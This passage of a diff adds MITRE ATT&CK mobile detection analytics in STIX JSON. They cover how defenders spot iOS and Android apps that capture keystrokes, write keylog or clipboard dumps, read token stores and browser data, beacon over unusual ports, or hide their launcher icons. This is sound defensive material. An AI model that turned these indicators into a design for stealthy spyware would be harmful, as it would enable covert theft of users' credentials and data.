+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1826",
+                    "description": "Defender observes an app enabling or using input-capture surfaces (custom keyboard extension with Full Access, abnormal UI text entry interception, pasteboard polling adjacent to login screens), then persisting and/or exfiltrating captured input. Chain: capability/consent (TCC for keyboard Full Access or input privacy domains) \u2192 intercept behavior (keyboard extension active, repeated text field \u2018editingChanged\u2019/secure entry focus, background pasteboard reads) \u2192 local write \u2192 near-term egress.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
+                            "name": "iOS:unifiedlog",
+                            "channel": "Keyboard extension Full Access change; privacy grant touching input/keyboard categories for <bundle_id>"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "iOS:unifiedlog",
+                            "channel": "UIWindow/UIView events indicating secure text entry focus, editingChanged bursts, unexpected firstResponder cycling"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE clipboard/keylog artifacts (clipboard.db, keys_*.txt) in container"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Max time from intercept to persist/exfil (e.g., 5\u201360s)."
+                        },
+                        {
+                            "field": "MinKeyEventBurst",
+                            "description": "Minimum key/commit or editingChanged count to flag harvesting (e.g., \u226510)."
+                        },
+                        {
+                            "field": "KeyboardFullAccessRequired",
+                            "description": "Require keyboard Full Access to escalate severity (true/false)."
+                        },
+                        {
+                            "field": "PersistPathRegex",
+                            "description": "Regex for keylog/clipboard dump files."
+                        },
+                        {
+                            "field": "ExfilDomainAllowlist",
+                            "description": "Known-good enterprise/analytics endpoints."
+                        },
+                        {
+                            "field": "UserContext",
+                            "description": "Foreground state, Focus modes, MDM policy."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.378000+00:00\", \"old_value\": \"2026-01-29 18:41:55.176000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--b6ef77d6-cc8b-478c-b7f8-7767bbb58960",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.381000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0706#AN1827",
+                            "external_id": "AN1827"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1827",
+                    "description": "The defender correlates app-attributed outbound sessions where protocol indicators such as TLS handshake, HTTP method and header patterns, DNS semantics, or other application-layer characteristics are observed over a destination port outside the approved baseline for that protocol and app role. The strongest Android evidence is repeated or persistent app-attributed traffic using HTTPS-, HTTP-, DNS-, WebSocket-, or other recognizable application behavior over uncommon destination ports, especially when the app is backgrounded, while the device is locked, without recent user interaction, or when the app is unmanaged or not approved for that protocol-to-port pairing.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "VPN:MobileProxy",
+                            "channel": "TLS handshake, HTTP method/header pattern, or WebSocket upgrade was observed on destination port outside approved port set for detected protocol during app-attributed outbound session"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "VPN:MobileProxy",
+                            "channel": "Repeated app-attributed sessions to same destination or service class used non-standard destination port with stable recurrence interval or persistent connection behavior"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "VPN:MobileProxy",
+                            "channel": "Destination port was not in approved protocol-to-port mapping for app identity or service class and session did not match known enterprise proxy, relay, or developer tooling exception"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "AppState=background when non-standard-port session began and no foreground transition occurred during repeated or persistent connection sequence"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "DeviceLockState=locked during outbound session using non-standard protocol-to-port pairing"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "LastUserInteractionDelta exceeded threshold before app-attributed session using non-standard protocol-to-port pairing"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Background work scheduler, job execution, foreground-service start, or persistent service activation immediately preceded outbound session using non-standard protocol-to-port pairing"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "iOS:MDMLog",
+                            "channel": "App identity using non-standard protocol-to-port pairing was unmanaged, outside approved app baseline, or not permitted to communicate using detected protocol/service over observed destination port"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "AllowedProtocolPortMappings",
+                            "description": "Approved protocol-to-port pairings vary by app, business workflow, proxy architecture, and enterprise policy."
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Approved app identities vary by organization, role, and device group."
+                        },
+                        {
+                            "field": "AllowedServiceClasses",
+                            "description": "Expected external service classes differ across app categories and enterprise mobile workflows."
+                        },
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window linking non-standard-port sessions with lifecycle, framework, or local state changes."
+                        },
+                        {
+                            "field": "RecentUserInteractionWindow",
+                            "description": "Defines how close a session must be to user activity to be considered expected."
+                        },
+                        {
+                            "field": "BeaconIntervalTolerance",
+                            "description": "Allowed recurrence interval for benign polling, sync, or persistent sessions differs by app type."
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Some apps should only initiate certain outbound communications while foregrounded."
+                        },
+                        {
+                            "field": "EnterpriseExceptionList",
+                            "description": "Known developer tools, enterprise proxies, VPNs, relays, and security products may legitimately use uncommon ports."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.381000+00:00\", \"old_value\": \"2026-03-19 17:21:51.812000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--7c96d701-391d-4904-b6ba-941344aaf059",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.379000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0706#AN1828",
+                            "external_id": "AN1828"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1828",
+                    "description": "The defender correlates managed-app or supervised-device outbound sessions where protocol indicators such as TLS handshake, HTTP semantics, or other application-layer behaviors are observed over destination ports outside the approved baseline for that protocol and bundle role. The strongest iOS evidence is network telemetry showing repeated or persistent sessions using recognizable application protocols over uncommon ports, particularly during background refresh, while the device is locked, or without recent user interaction. Because direct local runtime attribution is weaker than Android, the primary iOS analytic should be anchored on network protocol-versus-port mismatch plus supervised managed-app context and device-state enrichment.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "VPN:MobileProxy",
+                            "channel": "TLS handshake, HTTP method/header pattern, or WebSocket upgrade was observed on destination port outside approved port set for detected protocol during app-attributed outbound session"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "VPN:MobileProxy",
+                            "channel": "Repeated app-attributed sessions to same destination or service class used non-standard destination port with stable recurrence interval or persistent connection behavior"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "VPN:MobileProxy",
+                            "channel": "Observed protocol-to-port pairing was outside approved mapping for managed bundle or service class and did not match enterprise proxy, relay, or developer tooling exception"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "DeviceLockState=locked during outbound session using non-standard protocol-to-port pairing"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "LastUserInteractionDelta exceeded threshold before app-attributed session using non-standard protocol-to-port pairing"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "iOS:MDMLog",
+                            "channel": "App identity using non-standard protocol-to-port pairing was unmanaged, outside approved app baseline, or not permitted to communicate using detected protocol/service over observed destination port"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Background work scheduler, job execution, foreground-service start, or persistent service activation immediately preceded outbound session using non-standard protocol-to-port pairing"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "AllowedProtocolPortMappings",
+                            "description": "Approved protocol-to-port pairings vary by bundle, business workflow, proxy architecture, and enterprise policy."
+                        },
+                        {
+                            "field": "SupervisedRequired",
+                            "description": "Strongest bundle-governance and protocol-port baseline analytics depend on supervised iOS devices."
+                        },
+                        {
+                            "field": "AllowedManagedApps",
+                            "description": "Approved managed bundle identities vary by organization and device profile."
+                        },
+                        {
+                            "field": "AllowedServiceClasses",
+                            "description": "Expected external service classes differ across managed app categories and enterprise mobile workflows."
+                        },
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window linking non-standard-port sessions with lifecycle or local context signals."
+                        },
+                        {
+                            "field": "RecentUserInteractionWindow",
+                            "description": "Defines how close a session must be to user activity to be considered expected."
+                        },
+                        {
+                            "field": "BeaconIntervalTolerance",
+                            "description": "Allowed recurrence interval for benign polling, sync, or persistent sessions differs by bundle type."
+                        },
+                        {
+                            "field": "EnterpriseExceptionList",
+                            "description": "Known enterprise proxies, relays, developer tooling, and security products may legitimately use uncommon ports."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.379000+00:00\", \"old_value\": \"2026-03-19 19:41:30.977000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--07c399a0-e5ad-462d-99b9-f51ce8aa5061",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.375000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0707#AN1829",
+                            "external_id": "AN1829"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1829",
+                    "description": "The defender correlates creation or registration of deferred, repeating, or constraint-based background work with later task execution in the same app context, especially when the task executes without recent user interaction, from background state, or with follow-on file, sensor, or network behavior inconsistent with the app's declared role. The analytic prioritizes Android-observable control-plane effects: WorkManager enqueue operations, JobScheduler or AlarmManager scheduling, later wake or execution of the scheduled work, and post-trigger activity such as network sessions, local staging, or sensor access.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application enqueues WorkManager work request or schedules JobScheduler or AlarmManager task with delay, periodic interval, or execution constraints during the persistence/execution setup phase"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3",
+                            "name": "MobiledEDR:telemetry",
+                            "channel": "Scheduled task execution creates cache, staged payload, local output, or collected data artifact immediately after wake or job trigger"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between task registration and later execution, and between execution and follow-on behavior"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Apps legitimately expected to use WorkManager, JobScheduler, or AlarmManager such as mail, sync, backup, calendar, or enterprise management apps"
+                        },
+                        {
+                            "field": "AllowedConstraintProfiles",
+                            "description": "Expected charging, network, idle, or timing constraints for legitimate scheduled work"
+                        },
+                        {
+                            "field": "AllowedScheduleIntervals",
+                            "description": "Expected delay or periodic interval ranges for legitimate app behavior"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether follow-on activity from a scheduled task should only occur during active user-driven workflows for a given app"
+                        },
+                        {
+                            "field": "TriggerToNetworkWindow",
+                            "description": "Maximum expected delay between scheduled job trigger and outbound communication"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Minimum outbound volume after scheduled execution to treat network behavior as meaningful"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.375000+00:00\", \"old_value\": \"2026-04-09 17:06:45.192000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--f10a7842-ddb2-488b-93ac-e53fa6476614",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.383000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0707#AN1830",
+                            "external_id": "AN1830"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1830",
+                    "description": "The defender correlates creation of background scheduler activity with later execution of repeating or deferred work by the same managed app, then raises confidence when the triggered activity produces network, local-write, or other app behavior that occurs outside expected user context. Because iOS exposes weaker direct scheduling observability in many enterprise environments, the analytic anchors first on managed app posture and lifecycle-to-network or lifecycle-to-file effects, with NSBackgroundActivityScheduler-related behavior treated as strongest when runtime telemetry can observe background scheduler usage or execution callbacks.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3",
+                            "name": "MobiledEDR:telemetry",
+                            "channel": "Scheduled task execution creates cache, staged payload, local output, or collected data artifact immediately after wake or job trigger"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application creates or executes NSBackgroundActivityScheduler activity with repeating or deferred invocation semantics during the scheduling and trigger phases"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between scheduler creation, later execution, and follow-on file or network behavior"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Managed apps legitimately expected to perform background maintenance or deferred sync behavior"
+                        },
+                        {
+                            "field": "AllowedExecutionIntervals",
+                            "description": "Expected repeating interval or defer window for legitimate background activity"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether follow-on behavior from background scheduler execution should require recent user interaction"
+                        },
+                        {
+                            "field": "TriggerToNetworkWindow",
+                            "description": "Maximum expected delay between scheduled execution and outbound communication"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Minimum outbound volume after scheduled execution to treat network behavior as meaningful"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.383000+00:00\", \"old_value\": \"2026-04-09 17:09:39.997000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--fbc0a210-8942-4fcb-81f1-a120551013d4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.384000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0711#AN1837",
+                            "external_id": "AN1837"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1837",
+                    "description": "Correlates (1) application registration or activation of broadcast receivers tied to system or app-generated intents, (2) event-triggered execution while the application is not in the foreground, and (3) immediate follow-on actions such as network communication or data access. The defender observes a causal chain where an external event (e.g., BOOT_COMPLETED, SMS_RECEIVED, USER_PRESENT, CONNECTIVITY_CHANGE) triggers application execution that bypasses normal user-driven lifecycle expectations, followed by background processing or outbound activity.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application registers or invokes broadcast receiver via registerReceiver() or manifest-declared receiver + intent filter tied to system or app events"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Time correlation window between broadcast event and subsequent execution or network activity"
+                        },
+                        {
+                            "field": "SensitiveIntentList",
+                            "description": "List of broadcast intents considered high-risk (e.g., BOOT_COMPLETED, SMS_RECEIVED)"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Baseline of legitimate applications expected to use broadcast receivers for these intents"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Determines whether execution without foreground presence increases detection confidence"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.384000+00:00\", \"old_value\": \"2026-04-09 21:18:39.945000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--983ae9ea-a125-498a-862d-00d5bed2087a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.380000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0713#AN1840",
+                            "external_id": "AN1840"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1840",
+                    "description": "The defender correlates newly granted or recently exercised storage- or privilege-relevant access with burst reads of local files, local databases, or protected records from operating-system or external-storage locations, especially when the reads are inconsistent with app role, occur in background or locked-device context, or are followed by temporary data staging or network transmission. The analytic emphasizes Android-specific observables such as external storage access, app-private database reads where visible to the sensor, and repeated enumeration/read activity against local paths associated with media, tokens, caches, or exported application data.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "Managed app granted or retaining storage-related or elevated access inconsistent with declared function prior to local data access activity"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application queries or opens multiple local SQLite or app-associated database stores containing records unrelated to the app's declared function during the collection phase"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application performs burst reads across local system paths, external storage, media directories, cache locations, or local database files within a short interval as the primary collection phase"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between permission state, local data reads, optional staging, and outbound transfer"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Apps legitimately expected to read local files or databases such as backup, sync, file manager, security, or media management apps"
+                        },
+                        {
+                            "field": "AllowedPathList",
+                            "description": "Expected local paths, storage roots, and database locations for legitimate app behavior"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether sensitive local data access should happen only during active user-driven workflows"
+                        },
+                        {
+                            "field": "BurstReadThreshold",
+                            "description": "Minimum number of file or record reads within a short interval required to indicate suspicious collection"
+                        },
+                        {
+                            "field": "SensitivePathPatterns",
+                            "description": "Environment-specific list of high-value local paths such as external media roots, app export folders, token stores, or browser data locations"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Minimum upload size expected if collection is followed by exfiltration"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.380000+00:00\", \"old_value\": \"2026-04-08 20:08:28.641000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--b7b70725-f1d8-4fad-8fc4-fc1b9cbf77ef",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.381000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0713#AN1841",
+                            "external_id": "AN1841"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1841",
+                    "description": "The defender correlates supervised-device app posture and lifecycle context with repeated local file or local-database access effects, especially when a managed app reads browser, messaging, keychain-adjacent, or application-container data outside its expected role and then stages or uploads the result. Because direct low-level local system access visibility is weaker on iOS, the primary analytic is effect-based: managed app identity, file/database access where visible to the mobile sensor, background execution context, and near-term outbound communication.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "iOS:MDMLog",
+                            "channel": "Supervised managed app without expected local export, sync, or forensic role accesses or stages local records inconsistent with policy baseline"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application performs repeated record access, container traversal, or local data extraction processing against local stores before staging or transmission"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application reads multiple local container files, browser-history artifacts, messaging artifacts, or local records in rapid sequence during the collection phase"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between managed app posture, local access activity, optional staging, and upload"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Managed apps expected to access local records such as enterprise sync, backup, or approved investigation tools"
+                        },
+                        {
+                            "field": "AllowedContainerPatterns",
+                            "description": "Expected app-container or local artifact locations for legitimate workflows"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether local record access should happen only during active user interaction"
+                        },
+                        {
+                            "field": "BurstReadThreshold",
+                            "description": "Minimum number of local file or record reads in a short interval required for alerting"
+                        },
+                        {
+                            "field": "SensitiveArtifactPatterns",
+                            "description": "Environment-specific list of high-value browser, messaging, token, or local record artifacts"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Minimum outbound volume consistent with recent local data collection"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.381000+00:00\", \"old_value\": \"2026-04-08 20:07:42.093000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--944c3eaa-2809-4db3-ac7c-d1868e205793",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.380000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0714#AN1842",
+                            "external_id": "AN1842"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1842",
+                    "description": "Correlates (1) suppression or disablement of launcher-visible application components or effective reduction of user-facing launcher presence, (2) persistence of installed application state after icon suppression, and (3) continued runtime activity such as background execution, framework use, sensor access, or network communication after the icon becomes unavailable or is replaced by reduced-discoverability launcher behavior. The defender observes a causal chain where an app removes or reduces its launcher visibility while remaining operational and continuing meaningful activity.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
